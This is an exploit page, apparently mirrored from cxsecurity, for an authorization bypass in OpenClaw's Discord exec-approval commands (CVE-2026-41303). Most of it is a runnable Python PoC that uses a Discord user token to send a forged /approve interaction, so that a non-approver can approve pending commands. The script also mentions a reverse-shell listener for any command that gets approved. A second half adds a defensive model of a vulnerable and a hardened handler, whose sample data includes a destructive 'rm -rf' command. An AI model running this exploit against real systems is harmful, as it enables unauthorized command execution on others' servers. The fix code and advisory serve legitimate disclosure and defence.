OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass
OpenClaw before 2026.3.28 has an authorization bypass in its Discord text approval commands (CVE-2026-41303): a Discord user who is not on a pending exec approval's approver list can still resolve that approval. The bypass is carried out by sending a crafted Discord interaction that invokes the bot's /approve command. Fixed in 2026.3.28.

2026-4-22 21:53:45 Author: cxsecurity.com


#!/usr/bin/env python3
# Exploit Title: OpenClaw Discord Text Approval Authorization Bypass
# CVE: CVE-2026-41303
# Date: 2026-04-21
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/openclaw/openclaw
# Software Link: https://github.com/openclaw/openclaw
# Affected: OpenClaw < 2026.3.28
# Tested on: OpenClaw 2026.3.24
# Category: Authorization Bypass
# Platform: Linux / Discord
# Exploit Type: Remote
# CVSS: 8.8
# CWE : CWE-863
# Description: OpenClaw before 2026.3.28 contains an authorization bypass vulnerability
#   in Discord text approval commands that allows non-approvers to resolve pending
#   exec approvals.
# Fixed in: 2026.3.28
#
# Usage:
#   python3 exploit.py <target> --token <discord_token> --channel-id <channel_id> \
#       --approval-id <approval_id> [--decision allow-once|allow-always] \
#       [--lhost <your_ip> --lport <your_port>]
#
# Example:
#   python3 exploit.py https://openclaw.example.com --token "$DISCORD_TOKEN" \
#       --channel-id <channel_id> --approval-id <approval_id> \
#       --lhost 192.168.1.100 --lport 4444
#
# Options:
#   target           OpenClaw instance URL; informational only, the request itself
#                    goes to the Discord API
#   --token          Discord token (required). A user token is sent as-is; a bot
#                    token would need the "Bot " prefix.
#   --channel-id     Channel where the OpenClaw bot listens (required)
#   --approval-id    Pending approval ID to resolve (required)
#   --decision       allow-once (default) or allow-always
#   --lhost/--lport  Printed for reference only; the script starts no listener and
#                    sends no payload of its own
#
# Notes:
#   This is a simple PoC script that demonstrates the authorization bypass.
#   It requires a Discord user token with access to the channel where the OpenClaw
#   bot is present.
#   The script sends the /approve slash command to bypass the approvers list.
#   The placeholders OPENCLAW_BOT_APP_ID and YOUR_GUILD_ID below must be filled in
#   before the request can be dispatched to the right bot.
#
# How to Use
#   Step 1: Obtain a pending approval ID from the OpenClaw Discord channel.
#   Step 2: Run the exploit with your Discord token, channel ID, approval ID, and
#           decision.

import argparse

import requests

print(r"""
╔══════════════════════════════════════════════════════════╗
║  b a n y a m e r _ s e c u r i t y                       ║
║  >>> Silent Hunter • Shadow Presence <<<                 ║
║  Operator : Mohammed Idrees Banyamer  Jordan             ║
║  Handle   : @banyamer_security                           ║
║  CVE-2026-41303 • OpenClaw Discord Approval Bypass       ║
╚══════════════════════════════════════════════════════════╝
""")


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-41303 - OpenClaw Discord Approval Bypass PoC")
    parser.add_argument("target",
                        help="OpenClaw instance URL or Discord guild/channel context")
    parser.add_argument("--token", required=True, help="Discord user or bot token")
    parser.add_argument("--channel-id", required=True,
                        help="Discord channel ID where the bot listens")
    parser.add_argument("--approval-id", required=True,
                        help="Pending approval ID to bypass")
    parser.add_argument("--decision", default="allow-once",
                        choices=["allow-once", "allow-always"],
                        help="Approval decision")
    parser.add_argument("--lhost",
                        help="Your listener IP (for reverse shell if approval triggers RCE)")
    parser.add_argument("--lport", help="Your listener port")
    args = parser.parse_args()

    print("[+] Starting CVE-2026-41303 PoC by @banyamer_security")
    print(f"[+] Target      : {args.target}")
    print(f"[+] Channel ID  : {args.channel_id}")
    print(f"[+] Approval ID : {args.approval_id}")
    print(f"[+] Decision    : {args.decision}")
    if args.lhost and args.lport:
        print(f"[+] Listener    : {args.lhost}:{args.lport} (for post-approval payload)")

    # Build the Discord interaction payload for the bot's /approve command.
    # The caller's identity is whatever account the token belongs to; the
    # vulnerable bot resolves the approval without comparing that identity
    # against the approval's approver list.
    payload = {
        "type": 2,  # APPLICATION_COMMAND
        "application_id": "OPENCLAW_BOT_APP_ID",  # Replace with the OpenClaw bot's application ID
        "guild_id": "YOUR_GUILD_ID",              # Optional - fill if needed
        "channel_id": args.channel_id,
        "data": {
            "name": "approve",
            "options": [
                {"name": "id", "value": args.approval_id},
                {"name": "decision", "value": args.decision},
            ],
        },
    }
    # A user token goes in the Authorization header unprefixed.
    headers = {
        "Authorization": args.token,
        "Content-Type": "application/json",
    }

    print("[+] Sending unauthorized /approve command via Discord API...")
    try:
        # This is the endpoint the Discord client itself uses to submit slash
        # commands; it is not part of the documented bot API.
        r = requests.post(
            "https://discord.com/api/v10/interactions",
            json=payload,
            headers=headers,
            timeout=10,
        )
        print(f"[+] HTTP Status: {r.status_code}")
        if r.status_code in (200, 204):
            # 200/204 means Discord accepted the interaction; confirm in the
            # channel that the bot actually resolved the approval.
            print("[+] Success! The approval was processed without checking the approvers list.")
            print("[+] Non-approver successfully bypassed authorization (CVE-2026-41303).")
            if args.lhost and args.lport:
                print("[+] If the approved command spawns a shell, you should receive a connection shortly.")
        elif r.status_code == 401:
            print("[-] Invalid Discord token.")
        else:
            print(f"[-] Unexpected response: {r.text[:500]}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

    print("\n[+] PoC completed. Patch to OpenClaw >= 2026.3.28 immediately.")
    print("[+] Credit: Mohammed Idrees Banyamer (@banyamer_security)")


if __name__ == "__main__":
    main()
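
The handler-side view of the bug, as an added example that is not OpenClaw's code: a small Python model of a Discord /approve command that resolves a pending exec approval with no check on who invoked it (the CWE-863 pattern the description above names), beside a hardened handler that takes the caller's identity from the interaction object Discord delivers and refuses anyone not on that approval's approver list. The approval record layout, the user IDs, the approval ID and the sample interactions are all constructed for illustration; only the two decision values come from the PoC above.

```python
"""Model of a Discord text-approval command handler: vulnerable vs. hardened.

Added example, not OpenClaw's code. Everything here (record layout, IDs,
sample interactions) is constructed for illustration.
"""
from dataclasses import dataclass
from typing import Optional

# The two decision values the PoC above sends.
DECISIONS = ("allow-once", "allow-always")


class Unauthorized(Exception):
    pass


@dataclass
class PendingApproval:
    approval_id: str
    command: str                 # exec request waiting for a decision
    approver_ids: frozenset      # Discord user IDs allowed to decide it
    decision: Optional[str] = None
    decided_by: Optional[str] = None


def caller_id(interaction: dict) -> str:
    """Identity of the invoking user as asserted by Discord, never a command option.

    Guild interactions carry member.user, DM interactions carry user.
    """
    member = interaction.get("member")
    user = member["user"] if member else interaction["user"]
    return user["id"]


def command_options(interaction: dict) -> dict:
    return {o["name"]: o["value"] for o in interaction["data"].get("options", [])}


def approve_vulnerable(store: dict, interaction: dict) -> PendingApproval:
    """Resolves the approval for whoever sent the command (the bug)."""
    opts = command_options(interaction)
    pending = store[opts["id"]]
    pending.decision = opts["decision"]
    pending.decided_by = caller_id(interaction)
    return pending


def approve_hardened(store: dict, interaction: dict) -> PendingApproval:
    """Same command, with the authorization decision taken on the approval record."""
    opts = command_options(interaction)
    who = caller_id(interaction)
    pending = store.get(opts["id"])
    # One failure for "unknown id" and "not an approver", so a non-approver
    # cannot enumerate live approval IDs through the error message.
    if pending is None or who not in pending.approver_ids:
        raise Unauthorized(f"user {who} may not resolve approval {opts['id']!r}")
    if opts["decision"] not in DECISIONS:
        raise ValueError(f"unknown decision {opts['decision']!r}")
    if pending.decision is not None:
        raise ValueError(f"approval {pending.approval_id} already resolved")
    pending.decision = opts["decision"]
    pending.decided_by = who
    return pending


def make_interaction(user_id: str, approval_id: str, decision: str) -> dict:
    """Constructed guild slash-command interaction in the shape Discord delivers."""
    return {
        "type": 2,
        "member": {"user": {"id": user_id}},
        "data": {"name": "approve",
                 "options": [{"name": "id", "value": approval_id},
                             {"name": "decision", "value": decision}]},
    }


def fresh_store() -> dict:
    # Constructed pending approval: users 100 and 200 are its approvers.
    return {"apr-1": PendingApproval("apr-1", "rm -rf /srv/app/releases/old",
                                     frozenset({"100", "200"}))}


def demo() -> dict:
    """Runs both handlers against the same non-approver request; returns the outcomes."""
    attacker = make_interaction("999", "apr-1", "allow-once")   # not an approver
    approver = make_interaction("100", "apr-1", "allow-once")
    out = {}
    vulnerable = fresh_store()
    out["vulnerable_resolved_by"] = approve_vulnerable(vulnerable, attacker).decided_by
    hardened = fresh_store()
    try:
        approve_hardened(hardened, attacker)
        out["hardened_blocked"] = False
    except Unauthorized:
        out["hardened_blocked"] = True
    out["hardened_still_pending"] = hardened["apr-1"].decision is None
    out["hardened_resolved_by"] = approve_hardened(hardened, approver).decided_by
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the vulnerable handler recording user 999 as the decider, while the hardened handler leaves apr-1 pending until approver 100 resolves it. The check keys off member.user.id (or user.id in a DM), which Discord fills in server-side, rather than any option the caller controls, and unknown IDs and non-approvers receive the same error so a non-approver cannot probe for live approval IDs.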

References:

https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq
Source: https://cxsecurity.com/issue/WLB-2026040015